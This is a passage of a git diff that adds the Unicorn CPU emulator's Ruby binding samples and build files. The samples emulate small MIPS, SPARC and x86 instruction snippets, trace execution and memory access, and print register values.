time + mu.emu_start(ADDRESS, ADDRESS + M68K_CODE.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + d3 = mu.reg_read(UC_M68K_REG_D3) + puts(">>> D3 = 0x%x" % d3) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_m68k() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb new file mode 100644 index 0000000..c13a9cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_mips.rb @@ -0,0 +1,104 @@ +#!/usr/bin/env ruby +# Sample code for MIPS of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/mips_const' + +include UnicornEngine + +# code to be emulated +MIPS_CODE_EB = "\x34\x21\x34\x56" # ori $at, $at, 0x3456; +MIPS_CODE_EL = "\x56\x34\x21\x34" # ori $at, $at, 0x3456; + +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + +# Test MIPS EB +def test_mips_eb() + puts("Emulate MIPS code (big-endian)") + begin + # Initialize emulator in MIPS32 + EB mode + mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EB) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + 
mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.bytesize) + + # now puts out some registers + puts(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + puts(">>> r1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +# Test MIPS EL +def test_mips_el() + puts("Emulate MIPS code (little-endian)") + begin + # Initialize emulator in MIPS32 + EL mode + mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, MIPS_CODE_EL) + + # initialize machine registers + mu.reg_write(UC_MIPS_REG_1, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.bytesize) + + # now puts out some registers + puts(">>> Emulation done. Below is the CPU context") + + r1 = mu.reg_read(UC_MIPS_REG_1) + puts(">>> r1 = 0x%x" % r1) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_mips_eb() +puts("=" * 20) +test_mips_el() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb new file mode 100644 index 0000000..a4baf18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_sparc.rb @@ -0,0 +1,65 @@ +#!/usr/bin/env ruby +# Sample code for SPARC of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> +# Ruby sample ported by Sascha Schirra <sashs82@gmail.com> +require 'unicorn_engine' +require 'unicorn_engine/sparc_const' + +include UnicornEngine + +# code to be emulated +SPARC_CODE = "\x86\x00\x40\x02" # add %g1, %g2, %g3; +# memory address where emulation starts +ADDRESS = 0x10000 + + +# callback for tracing basic blocks +$hook_block = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + + +# callback for tracing instructions +$hook_code = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + +# Test SPARC +def test_sparc() + puts("Emulate SPARC code") + begin + # Initialize emulator in SPARC EB mode + mu = Uc.new UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, SPARC_CODE) + + # initialize machine registers + mu.reg_write(UC_SPARC_REG_G1, 0x1230) + mu.reg_write(UC_SPARC_REG_G2, 0x6789) + mu.reg_write(UC_SPARC_REG_G3, 0x5555) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, $hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, $hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + SPARC_CODE.bytesize) + + # now puts out some registers + puts(">>> Emulation done. 
Below is the CPU context") + + g3 = mu.reg_read(UC_SPARC_REG_G3) + puts(">>> G3 = 0x%x" %g3) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_sparc() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb new file mode 100644 index 0000000..00c480a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86.rb @@ -0,0 +1,552 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' + +include UnicornEngine + +X86_CODE32 = "\x41\x4a" # INC ecx; DEC edx +X86_CODE32_LOOP = "\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop +X86_CODE32_MEM_READ = "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx +X86_CODE32_MEM_WRITE = "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx +X86_CODE64 = "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" +X86_CODE32_INOUT = "\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx +X86_CODE64_SYSCALL = "\x0f\x05" # SYSCALL +X86_CODE16 = "\x00\x00" # add byte ptr [bx + si], al + +# memory address where emulation starts +ADDRESS = 0x1000000 + + +# callback for tracing basic blocks +HOOK_BLOCK = Proc.new do |uc, address, size, user_data | + puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) +end + +# callback for tracing instructions +HOOK_CODE = Proc.new do |uc, address, size, user_data| + puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) +end + + +# callback for tracing invalid memory access (READ or WRITE) +HOOK_MEM_INVALID = lambda do |uc, access, address, size, value, user_data| + if access 
== UC_MEM_WRITE_UNMAPPED + puts(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) + # map this memory in with 2MB in size + uc.mem_map(0xaaaa0000, 2 * 1024*1024) + # return True to indicate we want to continue emulation + return true + else + puts(">>> Missing memory is being READ at 0x%x" % address) + # return False to indicate we want to stop emulation + return false + end +end + + +# callback for tracing memory access (READ or WRITE) +HOOK_MEM_ACCESS = Proc.new do |uc, access, address, size, value, user_data| + if access == UC_MEM_WRITE + puts(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) + else # READ + puts(">>> Memory is being READ at 0x%x, data size = %u" % [address, size]) + end +end + +# callback for IN instruction +HOOK_IN = lambda do |uc, port, size, user_data| + eip = uc.reg_read(UC_X86_REG_EIP) + puts("--- reading from port 0x%x, size: %u, address: 0x%x" % [port, size, eip]) + if size == 1 + # read 1 byte to AL + return 0xf1 + end + if size == 2 + # read 2 byte to AX + return 0xf2 + end + if size == 4 + # read 4 byte to EAX + return 0xf4 + end + # we should never reach here + return 0 +end + + +# callback for OUT instruction +HOOK_OUT = Proc.new do |uc, port, size, value, user_data| + eip = uc.reg_read(UC_X86_REG_EIP) + puts("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" % [port, size, value, eip]) + + # confirm that value is indeed the value of AL/AX/EAX + v = 0 + if size == 1 + # read 1 byte in AL + v = uc.reg_read(UC_X86_REG_AL) + end + if size == 2 + # read 2 bytes in AX + v = uc.reg_read(UC_X86_REG_AX) + end + if size == 4 + # read 4 bytes in EAX + v = uc.reg_read(UC_X86_REG_EAX) + end + + puts("--- register value = 0x%x" %v) +end + + +# Test X86 32 bit +def test_i386() + puts("Emulate i386 code") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + # map 2MB memory for this emulation + 
mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED, HOOK_MEM_INVALID) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + # read from memory + tmp = mu.mem_read(ADDRESS, 2) + print(">>> Read 2 bytes from [0x%x] =" % (ADDRESS)) + tmp.each_byte { |i| print(" 0x%x" % i) } + + puts + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_i386_loop() + puts("Emulate i386 code with infinite loop - wait for 2 seconds then stop emulation") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_LOOP) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.bytesize, 2 * UC_SECOND_SCALE) + + # now print out some registers + puts(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_i386_invalid_mem_read() + puts("Emulate i386 code that read from invalid memory") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.bytesize) + rescue UcError => e + puts("ERROR: %s" % e) + end + + # now print out some registers + puts(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts(">>> ECX = 0x%x" % r_ecx) + puts(">>> EDX = 0x%x" % r_edx) + + rescue UcError => e + print("ERROR: %s" % e) + end +end + + +def test_i386_invalid_mem_write() + puts("Emulate i386 code that write to invalid memory") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all basic blocks with customized callback + #mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + #mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + # intercept invalid memory events + mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, HOOK_MEM_INVALID) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.bytesize) + rescue UcError => e + puts "ERROR: %s" % e + end + + # now print out some registers + puts ">>> Emulation done. 
Below is the CPU context" + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_edx = mu.reg_read(UC_X86_REG_EDX) + puts ">>> ECX = 0x%x" % r_ecx + puts ">>> EDX = 0x%x" % r_edx + + begin + # read from memory + print ">>> Read 4 bytes from [0x%x] = " % (0xaaaaaaaa) + tmp = mu.mem_read(0xaaaaaaaa, 4) + tmp.each_byte { |i| print(" 0x%x" % i) } + puts + + print ">>> Read 4 bytes from [0x%x] = " % 0xffffffaa + tmp = mu.mem_read(0xffffffaa, 4) + tmp.each_byte { |i| puts(" 0x%x" % i) } + puts + + rescue UcError => e + puts "ERROR: %s" % e + end + + rescue UcError => e + puts "ERROR: %s" % e + end +end + +def test_i386_context_save() + + puts("Save/restore CPU context in opaque blob") + address = 0 + code = '\x40' # inc eax + begin + # Initialize emulator + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 8KB memory for this emulation + mu.mem_map(address, 8 * 1024, UC_PROT_ALL) + + # write machine code to be emulated to memory + mu.mem_write(address, code) + + # set eax to 1 + mu.reg_write(UC_X86_REG_EAX, 1) + + puts(">>> Running emulation for the first time") + mu.emu_start(address, address+1) + + puts(">>> Emulation done. Below is the CPU context") + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + puts(">>> Saving CPU context") + saved_context = mu.context_save() + + puts(">>> Running emulation for the second time") + mu.emu_start(address, address+1) + puts(">>> Emulation done. Below is the CPU context") + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + puts(">>> CPU context restored. 
Below is the CPU context") + mu.context_restore(saved_context) + puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) + + rescue UcError => e + puts("ERROR: %s" % e) + end + +end + +# Test X86 32 bit with IN/OUT instruction +def test_i386_inout() + puts("Emulate i386 code with IN/OUT instructions") + begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32_INOUT) + + # initialize machine registers + mu.reg_write(UC_X86_REG_EAX, 0x1234) + mu.reg_write(UC_X86_REG_ECX, 0x6789) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, HOOK_CODE) + + # handle IN & OUT instruction + mu.hook_add(UC_HOOK_INSN, HOOK_IN, nil, 1, 0, UC_X86_INS_IN) + mu.hook_add(UC_HOOK_INSN, HOOK_OUT, nil, 1, 0, UC_X86_INS_OUT) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.bytesize) + + # now print out some registers + puts(">>> Emulation done. 
Below is the CPU context") + + r_ecx = mu.reg_read(UC_X86_REG_ECX) + r_eax = mu.reg_read(UC_X86_REG_EAX) + puts ">>> EAX = 0x%x" % r_eax + puts ">>> ECX = 0x%x" % r_ecx + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_64() + puts("Emulate x86_64 code") + begin + # Initialize emulator in X86-64bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_64 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64) + + # initialize machine registers + mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) + mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) + mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) + mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) + mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) + mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) + mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) + mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) + mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) + mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) + mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) + mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) + mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) + mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) + + # setup stack + mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) + + # tracing all instructions in range [ADDRESS, ADDRESS+20] + mu.hook_add(UC_HOOK_CODE, HOOK_CODE, 0, ADDRESS, ADDRESS+20) + + # tracing all memory READ & WRITE access + mu.hook_add(UC_HOOK_MEM_WRITE, HOOK_MEM_ACCESS) + mu.hook_add(UC_HOOK_MEM_READ, HOOK_MEM_ACCESS) + # actually you can also use READ_WRITE to trace all memory access + #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) + rescue UcError => e + puts("ERROR: %s" 
% e) + end + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + rax = mu.reg_read(UC_X86_REG_RAX) + rbx = mu.reg_read(UC_X86_REG_RBX) + rcx = mu.reg_read(UC_X86_REG_RCX) + rdx = mu.reg_read(UC_X86_REG_RDX) + rsi = mu.reg_read(UC_X86_REG_RSI) + rdi = mu.reg_read(UC_X86_REG_RDI) + r8 = mu.reg_read(UC_X86_REG_R8) + r9 = mu.reg_read(UC_X86_REG_R9) + r10 = mu.reg_read(UC_X86_REG_R10) + r11 = mu.reg_read(UC_X86_REG_R11) + r12 = mu.reg_read(UC_X86_REG_R12) + r13 = mu.reg_read(UC_X86_REG_R13) + r14 = mu.reg_read(UC_X86_REG_R14) + r15 = mu.reg_read(UC_X86_REG_R15) + + puts(">>> RAX = %d" % rax) + puts(">>> RBX = %d" % rbx) + puts(">>> RCX = %d" % rcx) + puts(">>> RDX = %d" % rdx) + puts(">>> RSI = %d" % rsi) + puts(">>> RDI = %d" % rdi) + puts(">>> R8 = %d" % r8) + puts(">>> R9 = %d" % r9) + puts(">>> R10 = %d" % r10) + puts(">>> R11 = %d" % r11) + puts(">>> R12 = %d" % r12) + puts(">>> R13 = %d" % r13) + puts(">>> R14 = %d" % r14) + puts(">>> R15 = %d" % r15) + #BUG + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_64_syscall() + puts("Emulate x86_64 code with 'syscall' instruction") + begin + # Initialize emulator in X86-64bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_64 + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) + + hook_syscall = Proc.new do |mu, user_data| + rax = mu.reg_read(UC_X86_REG_RAX) + if rax == 0x100 + mu.reg_write(UC_X86_REG_RAX, 0x200) + else + puts('ERROR: was not expecting rax=%d in syscall' % rax) + end + end + + # hook interrupts for syscall + mu.hook_add(UC_HOOK_INSN, hook_syscall, nil, 1, 0, UC_X86_INS_SYSCALL) + + # syscall handler is expecting rax=0x100 + mu.reg_write(UC_X86_REG_RAX, 0x100) + + begin + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.bytesize) + 
rescue UcError => e + puts("ERROR: %s" % e) + end + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + rax = mu.reg_read(UC_X86_REG_RAX) + puts(">>> RAX = 0x%x" % rax) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +def test_x86_16() + puts("Emulate x86 16-bit code") + begin + # Initialize emulator in X86-16bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_16 + + # map 8KB memory for this emulation + mu.mem_map(0, 8 * 1024) + + # set CPU registers + mu.reg_write(UC_X86_REG_EAX, 7) + mu.reg_write(UC_X86_REG_EBX, 5) + mu.reg_write(UC_X86_REG_ESI, 6) + + # write machine code to be emulated to memory + mu.mem_write(0, X86_CODE16) + + # emulate machine code in infinite time + mu.emu_start(0, X86_CODE16.bytesize) + + # now print out some registers + puts(">>> Emulation done. Below is the CPU context") + + tmp = mu.mem_read(11, 1) + puts("[0x%x] = 0x%x" % [11, tmp[0].ord]) + + rescue UcError => e + puts("ERROR: %s" % e) + end +end + + +test_i386() +puts("=" * 20) +test_i386_loop() +puts("=" * 20) +test_i386_invalid_mem_read() +puts("=" * 20) +test_i386_invalid_mem_write() +puts("=" * 20) +test_i386_context_save() +puts("=" * 20) +test_i386_inout() +puts("=" * 20) +test_x86_64() +puts("=" * 20) +test_x86_64_syscall() +puts("=" * 20) +test_x86_16() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb new file mode 100644 index 0000000..7aa6021 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/sample_x86_gdt.rb @@ -0,0 +1,97 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' + +include UnicornEngine + +F_GRANULARITY = 0x8 +F_PROT_32 = 0x4 +F_LONG = 0x2 +F_AVAILABLE = 0x1 + +A_PRESENT = 0x80 + +A_PRIV_3 = 0x60 +A_PRIV_2 = 0x40 +A_PRIV_1 = 0x20 +A_PRIV_0 = 0x0 + +A_CODE = 0x8 +A_DATA = 0x0 +A_TSS = 0x0 +A_GATE = 0x0 + +A_DATA_WRITABLE = 0x2 +A_CODE_READABLE = 0x2 + 
+A_DIR_CON_BIT = 0x4 + +S_GDT = 0x0 +S_LDT = 0x4 +S_PRIV_3 = 0x3 +S_PRIV_2 = 0x2 +S_PRIV_1 = 0x1 +S_PRIV_0 = 0x0 + +def create_selector(idx, flags) + to_ret = flags + to_ret |= idx << 3 + return to_ret +end + +def create_gdt_entry(base, limit, access, flags) + + to_ret = limit & 0xffff; + to_ret |= (base & 0xffffff) << 16; + to_ret |= (access & 0xff) << 40; + to_ret |= ((limit >> 16) & 0xf) << 48; + to_ret |= (flags & 0xff) << 52; + to_ret |= ((base >> 24) & 0xff) << 56; + return [to_ret].pack('Q') +end + +def write_gdt(uc, gdt, mem) + gdt.each_index do |idx| + offset = idx * GDT_ENTRY_SIZE + uc.mem_write(mem + offset, gdt[idx]) + end +end + +CODE_ADDR = 0x40000 +CODE_SIZE = 0x1000 + +GDT_ADDR = 0x3000 +GDT_LIMIT = 0x1000 +GDT_ENTRY_SIZE = 0x8 + +GS_SEGMENT_ADDR = 0x5000 +GS_SEGMENT_SIZE = 0x1000 + +uc = Uc.new UC_ARCH_X86, UC_MODE_32 + +uc.mem_map(GDT_ADDR, GDT_LIMIT) +uc.mem_map(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE) +uc.mem_map(CODE_ADDR, CODE_SIZE) + +gdt = Array.new (31) {|i| create_gdt_entry(0,0,0,0)} +gdt[15] = create_gdt_entry(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) +gdt[16] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Data Segment +gdt[17] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_CODE | A_CODE_READABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Code Segment +gdt[18] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_0 | A_DIR_CON_BIT, F_PROT_32) # Stack Segment + +write_gdt(uc, gdt, GDT_ADDR) +uc.reg_write(UC_X86_REG_GDTR, [0, GDT_ADDR, gdt.length * GDT_ENTRY_SIZE-1, 0x0]) + +selector = create_selector(15, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_GS, selector) + +selector = create_selector(16, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_DS, selector) + +selector = create_selector(17, S_GDT | S_PRIV_3) +uc.reg_write(UC_X86_REG_CS, selector) + +selector = create_selector(18, S_GDT | 
S_PRIV_0) +uc.reg_write(UC_X86_REG_SS, selector) + + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb new file mode 100644 index 0000000..53593b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/test_hook_gc.rb @@ -0,0 +1,60 @@ +#!/usr/bin/env ruby +require 'unicorn_engine' +require 'unicorn_engine/x86_const' +require 'weakref' + +include UnicornEngine + +X86_CODE32 = "\x41" # INC ecx; DEC edx + +# memory address where emulation starts +ADDRESS = 0x1000000 + +# callback for tracing instructions +hook_code = Proc.new do |uc, address, size, user_data| + puts("proc was run") +end + +hook_code_weak = WeakRef.new hook_code + +begin + # Initialize emulator in X86-32bit mode + mu = Uc.new UC_ARCH_X86, UC_MODE_32 + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, X86_CODE32) + + # initialize machine registers + mu.reg_write(UC_X86_REG_ECX, 0x1234) + mu.reg_write(UC_X86_REG_EDX, 0x7890) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + hook_code = nil # erase reference to proc + + GC.start() # force garbage collection to test if proc is garbage collected + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) + + mu = nil # erase reference to Uc because apparently it doesn't go out of scope after this? 
+rescue UcError => e + puts("ERROR: %s" % e) + exit 1 +rescue NoMethodError => e + puts("proc was garbage collected and we tried to invoke `call` on something strange") + exit 1 +end + +GC.start() + +if hook_code_weak.weakref_alive?() then + puts("proc was not garbage collected") + exit 1 +end + +puts "test passed" +exit 0 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile new file mode 100644 index 0000000..fa75df1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Gemfile @@ -0,0 +1,3 @@ +source 'https://rubygems.org' + +gemspec diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile new file mode 100644 index 0000000..43022f7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/Rakefile @@ -0,0 +1,2 @@ +require "bundler/gem_tasks" +task :default => :spec diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb new file mode 100644 index 0000000..d821f3d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/ext/extconf.rb @@ -0,0 +1,8 @@ +require 'mkmf' + +extension_name = 'unicorn_engine' + +dir_config(extension_name) +have_library('unicorn') + +create_makefile(extension_name) diff --git 